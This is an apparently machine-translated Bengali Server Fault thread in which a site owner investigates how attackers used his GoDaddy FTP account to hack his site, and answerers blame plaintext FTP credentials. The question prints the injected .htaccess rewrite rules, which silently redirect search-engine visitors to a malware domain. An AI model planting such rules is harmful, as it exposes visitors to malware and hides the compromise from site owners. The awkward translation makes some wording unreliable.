আপোস করা এফটিপি অ্যাকাউন্টের মাধ্যমে কোনও ওয়েবসাইট আক্রমণ আক্রমণ করে


9

আমার সাইটটি হ্যাক হয়ে গেছে এবং এই মুহুর্তে, আমি কিছু বিশদ জানি, তবে এটি কীভাবে ঘটল বা ভবিষ্যতে কীভাবে এটি প্রতিরোধ করা যায় সে সম্পর্কে আমি একটি ক্ষতির মধ্যে আছি। আক্রমণটি ছড়িয়ে দেওয়ার চেষ্টা করতে আমার আপনার সহায়তা দরকার যাতে আমি এটি আবার ঘটতে বাধা দিতে পারি। এটি কিছুটা দীর্ঘ, তবে আমি সমস্যাটি সমাধানে সহায়তা করার জন্য পর্যাপ্ত তথ্য দিচ্ছি তা নিশ্চিত করতে চাই।

এখানে কি ঘটেছে।

কয়েক সপ্তাহ আগে আমি আমার হোস্টিং সংস্থা গোডাডির কাছ থেকে একটি ইমেল পেয়েছিলাম যে আমার সাইটটি প্রচুর সংস্থান ব্যবহার করছে এবং তারা আশা করেছিল যে মাইএসকিউএল কোয়েরিই অপরাধী ছিল। প্রশ্নের ক্যোয়ারী ছিল একটি অনুসন্ধান ক্যোয়ারী যার এতে 5-6 টি পদ রয়েছে। আমি যেভাবে এটি সেট আপ করেছি, আপনি যত বেশি পদ অনুসন্ধান করেছেন, তত তত জটিল হয়ে উঠবে। সমস্যা নেই. আমি এটি ঠিক করেছিলাম, কিন্তু একই সাথে গোডাডিও অস্থায়ীভাবে আমার অ্যাকাউন্টটি বন্ধ করে দিয়েছিল এবং সবকিছু স্বাভাবিক অবস্থায় ফিরে আসার প্রায় 3 দিন আগে।

এই ঘটনার পরে, আমার অনুসন্ধান ইঞ্জিন ট্র্যাফিক নাটকীয়ভাবে হ্রাস পেয়েছে, প্রায় 90%। এটি স্তন্যপান করা হয়েছিল, আমি এর কিছুই ভেবেছিলাম না, এটিকে ক্যোয়ারী ফাইস্কোর কাছে লিখে লিখেছিলাম যে গুগল সাইটটি পুনরায় রেনলিং করার সাথে সাথে এটি সময় মতো ফিরে আসবে। তা হয়নি।

কিছু দিন আগে, আমি একজন ব্যবহারকারীর কাছ থেকে একটি ইমেল পেয়েছিলাম যে আমার সাইটটি ম্যালওয়ার হোস্ট করছে। আমি সাইটটি সরাসরি আমার ব্রাউজারে লোড করেছিলাম, তবে পৃষ্ঠায় কোনও ইঞ্জেকশন দেখিনি। তারপরে আমি আমার .htaccess ফাইলটি পরীক্ষা করে নীচের জিনিসগুলি পেয়েছি:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>

চতুর। আর একটু বিভ্রান্ত। অ্যাড্রেস বার বা বুকমার্ক থেকে সরাসরি সাইটে নেভিগেট করা, আমি সাধারণত যা করি তা সাইটটিকে স্বাভাবিক হিসাবে লোড করবে। খুব কমই আমি কখনও কোনও অনুসন্ধান ইঞ্জিনের একটি লিঙ্কের মাধ্যমে আমার সাইটে যাই, তাই হ্যাকটি যতক্ষণ না সনাক্ত করা যায় ততক্ষণ আবিষ্কার করা যায়। ম্যালওয়্যারটি সরাসরি আমার সাইটে হোস্ট করা হয়নি।

একটি দ্রুত অনুসন্ধানে দেখা গেছে যে অন্যান্য লোকদেরও একই সমস্যা হচ্ছে, যদিও আমি সন্দেহ করি যে আরও অনেক এখনও রয়েছে যারা এখনও এটি সনাক্ত করে নি। বেশিরভাগ প্রস্তাবনাগুলি ছিল সফ্টওয়্যারটির সর্বশেষ সংস্করণে আপগ্রেড করা, পাসওয়ার্ড পরিবর্তন করা ইত্যাদি to

আমি নিজের কাস্টম কনটেন্ট ম্যানেজমেন্ট সিস্টেমটি ব্যবহার করি এবং সর্বব্যাপী ওয়ার্ডপ্রেস না থাকায় আমি আরও গভীর গর্ত করেছি। আমি পিএইচপি শোষণে ব্যবহৃত সমস্ত সাধারণ ফাংশনগুলির জন্য আমার সমস্ত ফাইল স্ক্যান করেছিলাম: বেস d৪_ডেকোড, এক্সিকিউট, শেল, ইত্যাদি ... সন্দেহজনক কিছুই হয়নি এবং কোনও অতিরিক্ত ফাইল উপস্থিত ছিল না।

এরপরে আমি গোডাড্ডির ফাইল ম্যানেজারের ইতিহাস পরীক্ষা করে দেখলাম যে .htaccess ফাইলটি ঠিক একই তারিখে পরিবর্তিত হয়েছিল যখন আমার অনুসন্ধান অনুসন্ধানে অনেক বেশি সার্ভার সংস্থান ব্যবহার করার অভিযোগ আনা হয়েছিল। এটি একটি দুর্ভাগ্যজনক কাকতালীয় ঘটনা হতে পারে, তবে আমি পুরোপুরি নিশ্চিত নই। .Htaccess ফাইলে পুনর্নির্দেশটি রিসোর্স নিবিড় বলে মনে হয় না এবং ক্যোয়ারী যথেষ্ট জটিল ছিল যে এটি সংস্থান-নিবিড় হতে পারে।

আমি নিশ্চিত হতে চেয়েছিলাম যে আমার কোডটি সমস্যা ছিল না, তাই .htaccess ফাইলটি সংশোধন করা হয়েছিল এমন সময়ে আমি সন্দেহজনক ক্রিয়াকলাপের জন্য ট্র্যাফিক লগগুলি চেক করেছিলাম, তবে এমন কোনও জিইটি বা পোস্ট পোস্ট দেখিনি যা অস্বাভাবিক দেখায় বা এর মতো হ্যাক প্রচেষ্টা।

অবশেষে, আমি GoDaddy থেকে এফটিপি লগগুলির জন্য অনুরোধ করেছিলাম এবং খুঁজে পেয়েছিলাম যে .htaccess ফাইলটি পরিবর্তিত হওয়ার সময় সেখানে অননুমোদিত FTP অ্যাক্সেস ছিল। আমি তখন ছুটিতে ছিলাম, আমার কম্পিউটারটি শারীরিকভাবে বন্ধ করে দিয়েছিলাম এবং অ্যাক্সেস শংসাপত্রগুলির সাথে আর কেউ নেই। দেখে মনে হচ্ছে যে এফটিপি যে কেউ অ্যাকাউন্টটির জন্য প্রাথমিক এফটিপি ব্যবহারকারী ব্যবহার করেছে, তবে 91.220.0.19 এর আইপি সহ, এটি দেখতে লাতভিয়ার মত দেখাচ্ছে ।

ভাগ করা হোস্টিংয়ে এটি প্রদর্শিত হয় GoDaddy স্বয়ংক্রিয়ভাবে সাইটের ইউআরএল ভিত্তিক একটি প্রাথমিক এফটিপি ব্যবহার করে। এটি অত্যন্ত অনুমানযোগ্য বা কমপক্ষে, আমি যখন আমার হোস্টিং অ্যাকাউন্টটি সেট আপ করতাম তখন এটি ছিল। আমি বেশ কয়েক বছর আগে প্রথম হোস্টিং অ্যাকাউন্টে সাইন আপ করেছি, তাই এটি পরিবর্তিত হতে পারে, তবে যা মনে আছে তা থেকে, আমি প্রাথমিক এফটিপি ব্যবহারকারীর নামটি বেছে নিতে পারিনি। বর্তমানে, আপনি ব্যবহারকারীর নামটি পরিবর্তন করতেও অক্ষম এবং এটি মনে হচ্ছে যে আপনি নিজের অ্যাকাউন্ট বাতিল না করে এবং পদত্যাগ না করলে GoDaddy কোনওভাবেই অক্ষম। আপনি অন্যান্য এফটিপি ব্যবহারকারী তৈরি করতে, মুছতে এবং সম্পাদনা করতে পারবেন, প্রাথমিক এফটিপি ব্যবহারকারী মুছতে পারবেন না। শুধুমাত্র পাসওয়ার্ড পরিবর্তন করা যেতে পারে।

প্রাথমিক এফটিপি ব্যবহারকারীর নাম বাদে সাইট, ডাটাবেস, অ্যাডমিন এবং অ্যাকাউন্টের অ্যাক্সেস শংসাপত্রগুলির সমস্ত হ'ল জিব্বারিশ, এলোমেলো ব্যবহারকারীর নাম এবং পাসওয়ার্ড যা আপনার বিড়ালের মতো দেখতে আপনার কীবোর্ডে চলেছে। উদাঃ lkSADf32! J asJd3।

ভাইরাস, ম্যালওয়্যার ইত্যাদির জন্য আমি আমার কম্পিউটারটি ভালভাবে স্ক্যান করেছি যদি এটি লিঙ্কটির দুর্বল পয়েন্ট তবে কিছুতেই আপস আপ হয় নি। আমি একটি ফায়ারওয়াল, একটি অ্যান্টি-ভাইরাস প্রোগ্রাম ব্যবহার করি এবং নিরাপদ ব্রাউজিং অভ্যাস ব্যবহার করার চেষ্টা করি।

আমি যখন আমার সাইট আপডেট করি তখন আমি কোর এফটিপি এলই এবং একটি এসএসএইচ / এসএফটিপি সংযোগ ব্যবহার করি। হোস্টিং অ্যাকাউন্টটি একটি লিনাক্স সেটআপ।

GoDaddy প্রযুক্তি সহায়তার সাথে কথা বলার ক্ষেত্রে, তারা এফটিপি পাসওয়ার্ডের সাথে কীভাবে আপস হয়েছে তা নিশ্চিত নয়। ভাগ করা হোস্টিংয়ে, তারা এফটিপি ব্যবহারকারী পর্যায়ে একটি আইপি ব্লক রাখতে অক্ষম। তারা প্রাথমিক এফটিপি ব্যবহারকারীর নাম পরিবর্তন করতে অক্ষম। যখন আমি জিজ্ঞাসা করলাম এফটিপি অ্যাক্সেসের আশেপাশে তাদের নিষ্ঠুর শক্তি সুরক্ষা আছে কিনা, প্রযুক্তিটি প্রথমে অনিশ্চিত বলে মনে হয়েছিল, কিন্তু তারপরে বলেছিল যে আমি এটি কয়েকবার পুনর্বিবেচনা করার পরে তারা করেছি। তবে, আমি মনে করি আমি আগের কলটিতে একই প্রশ্ন জিজ্ঞাসা করেছি এবং শুনেছি যে GoDaddy এর এফটিপি অ্যাক্সেসে নিরপেক্ষ সুরক্ষা নেই। এই মুহুর্তে, আমি জানি না তারা করুক বা না করুক।

আমি বোর্ডের মাধ্যমে আমার অ্যাক্সেসের সমস্ত শংসাপত্রগুলি পরিবর্তন করে দিয়েছি এবং htaccess ফাইল ব্যবহার করে লাত্ভীয় আইপি ঠিকানাটিও নিষিদ্ধ করেছি (তারা এফটিপি ব্যবহার করলে সম্ভবত কোনও পার্থক্য দেখাবে না), তবে এফটিপি কীভাবে হয় তা আমি এখনও নিশ্চিত নই পাসওয়ার্ড দিয়ে শুরু করার জন্য আপস করা হয়েছিল।

আমি মোটামুটি নিশ্চিত হয়েছি যে সমস্যাটি আমার কোড (যদিও এটি ছিল, এফটিপি তথ্যটি প্রকাশ করা উচিত হয়নি) বা আমার কম্পিউটারের সাথে নয়। আমার সন্দেহ, কিন্তু কীভাবে প্রমাণ করতে হয় তা জানি না, এটি ব্যবহারকারীর নাম অনুমানযোগ্য হওয়ার কারণে এফটিপি পাসওয়ার্ডটি জোর করে জোর করা হয়েছিল। ব্রুট-ফোর্স আক্রমণটি সার্ভার রিসোর্সগুলি ব্যবহৃত হওয়ার সাথেও মিলিত হতে পারে (আমার প্রশ্নের সন্ধানে দোষ দেওয়া হয়েছে), তবে সার্ভারের প্রযুক্তিগত দিকটি যথেষ্ট কিনা তা সম্ভব কিনা তাও আমি জানি না।

এখন আমার মনে হচ্ছে আমি কী করব জানি তার শেষে আছি। আক্রমণটি কীভাবে করা হয়েছিল এবং কীভাবে এটি প্রতিরোধ করা যায় তা আমি বুঝতে সক্ষম হতে চাই, সুতরাং যদি আক্রমণ আক্রমণকারী ভেক্টর, ডায়াগনস্টিকগুলি চালানো যেতে পারে বা অতিরিক্ত সুরক্ষা ব্যবস্থা সম্পর্কে আপনার আরও কিছু ধারণা থাকে তবে আমি অত্যন্ত কৃতজ্ঞ হব। আমি হোস্ট পরিবর্তন করতে বা ভাগাভাগি করে হোস্টিং করতে রাজি হওয়ার চেয়ে বেশি, তবে আমি নিশ্চিত হতে চাই যে আমি এটি আবার ঘটতে বাধা দিতে পারি।

আমাকে সাহায্য করুন, ওবি-وان কেনোবি ...

উত্তর:


8

আপনার পোস্টের মাধ্যমে পড়ার সময় এমন কিছু পরিচিত যা দ্বিগুণ হয়েছে। তারপরে এটি আমাকে আঘাত করেছে: আমি এক মাস আগেও এটি দেখেছিলাম যখন কোনও গেমের জন্য কোনও সাইটে অ্যাক্সেস করার চেষ্টা করছিলাম। এখানে দেখুন - একই আচরণ, কেবল অনুসন্ধান ইঞ্জিন রেফারারদের নিয়ে নেওয়া পুনর্নির্দেশের পদক্ষেপ।

আপনার ডোমেন নামটি .htaccessদেখতে চেনা লাগছে কারণ কয়েক সপ্তাহ আগে আমার হোম কম্পিউটারের অ্যান্টিভাইরাস এ সম্পর্কে আমার কাছে উচ্চস্বরে শব্দ করেছিল।

এবং, আপনি কি এটি জানবেন না, যে সাইটের হোস্ট আমি এটি পর্যবেক্ষণ করেছি? যাও বাবা.

আমি মনে করি না যে আপনি নিষ্ঠুর-জোর হয়ে গিয়েছিলেন বা নিজের পাসওয়ার্ডটি নিজের কোনও দোষের দ্বারা আপস করেছেন; আমি মনে করি গোডাডিই এখানে আপোস করেছিলেন। এবং আমি এটিকে এফটিপি পাসওয়ার্ডগুলি সরল পাঠ্যে সংরক্ষণ করতে পারি না put আরও কিছু খননকারী এই নিবন্ধটি একই পরামর্শ দিয়েছে; বর্বর শক্তি সুরক্ষা তাদের সমস্যাগুলির মধ্যে সর্বনিম্ন হতে পারে।


আমি ধরে নিচ্ছি যে ওপেনটি এফটিপি শংসাপত্র পরিবর্তন করেছে। আশা করি তারা ক্লিয়ারটেক্সট পাসওয়ার্ড সঞ্চয়স্থান ব্যবহার করছে না। এটি হবে - আহেম - বরং হতাশাবোধক।
ইভান অ্যান্ডারসন

@ ইভান শেষ অনুচ্ছেদে লিঙ্কিত নিবন্ধটি দেখুন, যদিও; "দোষী গোডাড্ডি" তত্ত্বটিকে সমর্থন করে বলে মনে হচ্ছে। এর অর্থ কী: তাদের পাসওয়ার্ড এনক্রিপশন কেবল কল্পনার একটি আকর্ষণীয় অনুশীলন। ;)
শেন মাদেন

সব আবার দেখার পরে, আমি এসএসএইচ মাধ্যমে সংযুক্ত । তবে আমাকে যে শংসাপত্রগুলি ব্যবহার করতে হবে সেগুলি হ'ল প্রাথমিক এফটিপি ব্যবহারকারীর জন্য। আমি শেয়ার্ড হোস্টিংয়ের জন্য দেখতে পাচ্ছি এমন এফটিপি-র জন্য কাজ না করে কেবলমাত্র এসএসএইচের জন্য কোনও ব্যবহারকারী সেটআপ করার কোনও উপায় নেই।
প্রিয় অ্যাবি

@ প্রিয়ত আপনি যখন এসএসএইচ দিয়ে লগইন করেন, শংসাপত্রগুলি ট্রানজিটে এনক্রিপ্ট করা হয়। কোনও সুরক্ষিত প্রোটোকল যেমন এফটিপি বা এইচটিটিপি-র মাধ্যমে সংযোগ করার সময় তারা কেবল তারে শুকিয়ে যাওয়ার ঝুঁকিতে পড়বে।
শেন ম্যাডেন

2
অন্য কোনও কারণে যদি আপনি পুরো পোস্টটি পড়ার ধৈর্য ধারণ করেন তবে তা উত্সাহিত।
ওয়েসলি

6

সহজ! এফটিপি ব্যবহার করবেন না। এটি সরল-পাঠ্যে শংসাপত্র প্রেরণ করে এবং প্লেইন-পাঠ্যে সমস্ত ডেটা প্রেরণ করে। ফাইল স্থানান্তরিত করার এটি সবচেয়ে সুরক্ষিত একটি উপায়। আপনার হোস্ট যদি অন্য কোনও উপায়ে সমর্থন না করে তবে একটি নতুন হোস্ট সন্ধান করুন।


+1 - আপনি আপনার হোস্ট করা সার্ভারের সাথে সরাসরি পয়েন্ট-টু-পয়েন্ট সংযোগ পেতে পারবেন না। সংজ্ঞা অনুযায়ী আপনার স্পষ্ট এফটিপি লগঅন হবে আছে ট্রানজিট অবিশ্বস্ত নেটওয়ার্কে। আপনার মালিকানা পেয়েছে কারণ আপনার শংসাপত্রগুলি এক সময় বা অন্য কোনও সময় কোনও কোনও জায়গায় লগইন হয়েছিল। (প্রকৃতপক্ষে, ডিডিডিএসগুলি ভাল যে আক্রমণকারী যিনি আপনার সাইটটি সংশোধন করেছিলেন তিনিই ছিলেন না যে তিনি শংসাপত্রগুলি ক্যাপচার করেছিলেন You আপনি সম্ভবত কোনও আইএসপি'র নেটওয়ার্কের অভ্যন্তরে একটি সনাক্ত করা স্নিফার দ্বারা লগইন করেছেন এবং কেনা-বেচা করা শংসাপত্রগুলির একটি ডাটাবেসে যুক্ত করেছেন। ..) আপনি আজকের ইন্টারনেটে না পারেন, W / স্পষ্ট টেক্সট প্রমাণীকরণ কেবল লাইভ। সময়কাল।
ইভান অ্যান্ডারসন

আমি আসলে এটি করি না, আমি একবারে এফটিপি ব্যবহার না করে এক বছরেরও বেশি সময় ধরে এসএসএইচ ব্যবহার করেছি। যাইহোক, যদিও GoDaddy ফাইল স্থানান্তর করার অন্যান্য উপায় সরবরাহ করে, এটি আপনাকে প্রাথমিক এফটিপি ব্যবহারকারী মুছতে দেয় না। আমি যেমন বলেছিলাম, হোস্ট স্যুইচিংয়ের ক্ষেত্রে আমি ঠিক আছি, আমি কী ঘটেছে তা বের করতে চাই। কীভাবে কেউ এফটিপি শংসাপত্রের জন্য শুনবে?
প্রিয় অ্যাবি

@ প্রিয় - এফটিপি ব্যবহারকারী এবং পাসওয়ার্ড প্যাকেটগুলির সরল পাঠ্যে থাকবে। প্যাকেটগুলি ক্যাপচারে সক্ষম যে কোনও প্রোগ্রাম এটি প্রকাশ করবে। ইভানের মন্তব্য এটি ভালভাবে ব্যাখ্যা করে।
MDMarra

@ ইভান - সুতরাং সমাধানটি হ'ল: কখনও এফটিপি এবং ডাইচ শেয়ার্ড হোস্টিং ব্যবহার করবেন না? অথবা আপনি কি এসএসএইচ একচেটিয়াভাবে ব্যবহার করতে পারেন এবং এখনও ভাগ করে নেওয়া হোস্টিংয়ের মাধ্যমে নিরাপদ থাকতে পারেন?
প্রিয় অ্যাবি

3
@ প্রিয় - কোনও হোস্ট যদি আমার সাইটের জন্য FTP অক্ষম করতে না পারে তবে আমি সেগুলি ব্যবহার করতে চাই না।
MDMarra
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.